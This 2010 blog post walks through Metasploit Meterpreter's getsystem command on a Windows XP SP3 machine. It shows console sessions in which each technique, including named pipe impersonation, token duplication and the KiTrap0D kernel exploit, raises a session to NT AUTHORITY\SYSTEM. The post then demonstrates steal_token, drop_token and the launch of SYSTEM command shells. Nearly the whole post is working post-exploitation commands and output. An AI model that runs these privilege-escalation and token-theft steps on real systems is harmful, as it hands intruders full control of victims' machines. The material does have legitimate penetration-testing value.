Friday, January 29, 2010

metasploit getsystem command

Shiny new hotness...

meterpreter > getuid
Server username: WINXPSP3\user
**user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h

Usage: getsystem [options]


Attempt to elevate your privilege to that of local system.


OPTIONS:


-h Help Banner.

-t
The technique to use. (Default to '0').
0 : All techniques available

1 : Service - Named Pipe Impersonation (In Memory/Admin)

2 : Service - Named Pipe Impersonation (Dropper/Admin)

3 : Service - Token Duplication (In Memory/Admin)

4 : Exploit - KiTrap0D (In Memory/User)


meterpreter > getsystem -t 1

...got system (via technique 1).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem -t 2

...got system (via technique 2).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem -t 3

...got system (via technique 3).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem

...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Hey I want user back!

meterpreter > getsystem -t 4
...got system (via technique 4).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM


steal_token


meterpreter > steal_token -h

[-] Usage: steal_token [pid]


meterpreter > ps


Process list

============


PID Name Arch User Path

--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM

368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe

616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe

660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe

672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe

832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe

1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe

1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE

540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe

980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe

1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe

2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe

960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE

664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe


meterpreter > steal_token 1560

Stolen token with username: WINXPSP3\user

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > shell
<--now uses -t by default Process 1272 created. Channel 2 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami

whoami

WINXPSP3\user

C:\Documents and Settings\user>


wait I want a SYSTEM shell again

meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM

C:\Documents and Settings\user>


or call execute without -t to use your process token

meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM

C:\Documents and Settings\user>



2 comments:

Stepan said...

How is it possible?

Is it public available?

CG said...

svn up!